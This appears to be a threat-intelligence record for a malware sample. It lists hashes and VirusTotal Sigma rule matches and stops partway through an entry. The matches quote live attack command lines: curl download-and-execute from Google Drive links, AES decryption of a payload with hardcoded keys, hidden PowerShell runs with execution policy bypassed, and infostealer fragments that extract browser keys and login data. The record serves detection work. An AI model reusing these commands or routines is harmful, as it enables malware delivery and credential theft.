0db53f4bbd5ca58c7a49994ca525ffcd
Hash
- MD5: 0db53f4bbd5ca58c7a49994ca525ffcd
- SHA1: df0ed60b6a989f51ac9cd6f367f25bd98c4bdd53
- SHA256: 3e9f88021fb7e50802fd0cd0aeb026215c2740119e5bc0847f99a4464c182ba8
- First Seen: 2026-05-26
- Last Seen: 2026-05-26
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "3e9f88021fb7e50802fd0cd0aeb026215c2740119e5bc0847f99a4464c182ba8",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/3e9f88021fb7e50802fd0cd0aeb026215c2740119e5bc0847f99a4464c182ba8"
},
"attributes": {
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "78dc71a5599dc85b3d37a6ab0f014aa5110b2ce1b2346c8f2730e0c481977781",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Curl Download And Execute Combination",
"rule_description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.",
"rule_author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local\\Temp && curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" && temp.pdf",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "7d262d8417cb03b2a9d2b935ae55980f22abc3aa7cffc36e57eda761068226dc",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Invocations - Specific",
"rule_description": "Detects suspicious PowerShell invocation command parameters",
"rule_author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"MessageTotal": "3",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"Path": "",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "high",
"rule_id": "b9bc90b7745bcb3a2cf9de40d1d419d18ead6650040015c7f4755848e9bfdb05",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious MSHTA Child Process",
"rule_description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution",
"rule_author": "Michael Haag",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local\\Temp && curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" && temp.pdf",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "cmd /c sc query WinDefend",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\pipe\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"CommandLine": "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "124bf07ac70743e91b5698e3731aae0330fc182aa58036390f2a0457a90b5341",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Download - Powershell Script",
"rule_description": "Detects suspicious PowerShell download command",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "2f2546b453b2e10b60c4d6b1345bc05c2dc99e42daef2e236a11005d772937ad",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Detected Windows Software Discovery - PowerShell",
"rule_description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.",
"rule_author": "Nikita Nazarov, oscd.community",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"MessageTotal": "3",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"Path": "",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "#\r\nfunction DownloadFile {\r\n\tParam (\r\n\t\t[Parameter(Position=0,Mandatory=$True)] [String] $downloadUrl,\r\n\t\t[Parameter(Position=1,Mandatory=$True)] [String] $filePath\r\n\t)\r\n\t\r\n\tInvoke-WebRequest -Uri $downloadUrl -OutFile $filePath -UseBasicParsing\r\n}\r\n\r\n$id = (Get-WmiObject -Class Win32_ComputerSystemProduct).UUID\r\n$tempPath = $env:TEMP\r\nNew-Item -Path \"$tempPath\\$id\" -ItemType Directory -Force\r\n$storePath = \"$tempPath\\$id\"\r\n\r\n$serverenc = \"https://drive.google.com/uc?export=download`&id=1FA9Tvcak [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"MessageTotal": "3",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"Path": "",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6e1823de286f8bef414c648f5738bec3bd40700cba3765da26e6500bc2d8e387",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Detect Virtualization Environment",
"rule_description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n",
"rule_author": "frack113, Duc.Le-GTSC",
"match_context": [
{
"values": {
"ScriptBlockText": "#\r\nfunction DownloadFile {\r\n\tParam (\r\n\t\t[Parameter(Position=0,Mandatory=$True)] [String] $downloadUrl,\r\n\t\t[Parameter(Position=1,Mandatory=$True)] [String] $filePath\r\n\t)\r\n\t\r\n\tInvoke-WebRequest -Uri $downloadUrl -OutFile $filePath -UseBasicParsing\r\n}\r\n\r\n$id = (Get-WmiObject -Class Win32_ComputerSystemProduct).UUID\r\n$tempPath = $env:TEMP\r\nNew-Item -Path \"$tempPath\\$id\" -ItemType Directory -Force\r\n$storePath = \"$tempPath\\$id\"\r\n\r\n$serverenc = \"https://drive.google.com/uc?export=download`&id=1FA9Tvcak [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "7ce2e69836f6ffe690530adb579824031c46a1bee75e6f8dc9ec028fe59c5681",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Directory Enumeration",
"rule_description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "llName -Destination $destpath -ErrorAction SilentlyContinue\r\n\t\t\t} -ErrorAction SilentlyContinue\r\n\t\t}\r\n\t}\r\n}\r\n\r\nfunction GetBrowserData {\r\n\t$extensionpath = \"$storePath\\extensions.txt\"\r\n\t# Edge\r\n\ttry {\r\n\t\t$jsonContent = Get-Content -Path \"$localPath\\Microsoft\\Edge\\User Data\\Local State\" -Raw\r\n\t\t$jsonObject = $jsonContent | ConvertFrom-Json\r\n\t\tUnprotect-Data -encryptedData $jsonObject.os_crypt.encrypted_key -filePath \"$storePath\\edge_masterkey\"\r\n\r\n\t\t$edgeProcess = Get-Process -Name \"msedge\" -Error [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "2"
}
},
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"MessageTotal": "3",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"Path": "",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "a5f575ade1f2aaba452086d3418d8a893e94b28e30da42ad98b58df4a4fe9c2d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential Suspicious PowerShell Keywords",
"rule_description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework",
"rule_author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)",
"match_context": [
{
"values": {
"ScriptBlockText": " \"Processes:`r`n$(Get-Process | Out-String)\"\r\n\r\n\t\"$systemInfo`r`n$computerInfo`r`n$diskInfo`r`n$volumeInfo`r`n$networkAdapters`r`n$processes`r`n\" | Out-File -FilePath $outputFile\r\n\r\n\t$INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate\r\n\t$INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publishe [TRUNCATED]",
"Path": "",
"ScriptBlockId": "2388b66e-2b02-4195-89f0-a854cb7fea6b",
"MessageTotal": "3",
"EventID": "4104",
"MessageNumber": "3"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine",
"rule_author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local\\Temp && curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" && temp.pdf",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"FileVersion": "7.55.1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local\\Temp && curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" && temp.pdf",
"CommandLine": "curl -L -o temp.pdf \"https://drive.google.com/uc?export=download&id=1YtDdLM3U6q__ZiX7fSidoktBrWbC2OsK\" ",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Bruno\\Desktop\\sleestak_payload_1.hta\"",
"CommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\SysWOW64\\mshta.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\Bruno\\AppData\\Local && curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" && powershell -Command \"[System.IO.File]::WriteAllBytes('pipe.zip', (New-Object System.Security.Cryptography.AesManaged).CreateDecryptor([System.Text.Encoding]::UTF8.GetBytes('ftrgmjekglgawkxjynqrwxjvjsydxgjc'), [System.Text.Encoding]::UTF8.GetBytes('rhmrpyihmziwkvln')).TransformFinalBlock([System.IO.File]::ReadAllBytes('pip [TRUNCATED]",
"CommandLine": "curl -L -o pipe.log \"https://drive.google.com/uc?export=download&id=1jqpw8UHpsY5ps3nKOfkyo2ql4hC23Mew\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "low",
"rule_id": "0f8e3c8e1fbbfbe7cf4a673a7445d726cd5c91d52f036a090b8e242dd368058e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious File Access to Browser Credential Storage",
"rule_description": "Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.\nAdversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.\nThis behavior is often commonly observed in credential stealing malware.\n",
"rule_author": "frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore",
"match_context": [
{
"values": {
"FileName": "%LOCALAPPDATA%\\microsoft\\edge\\user data\\default\\login data"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Local\\",
"OriginalFileName": "PowerShell.EXE",
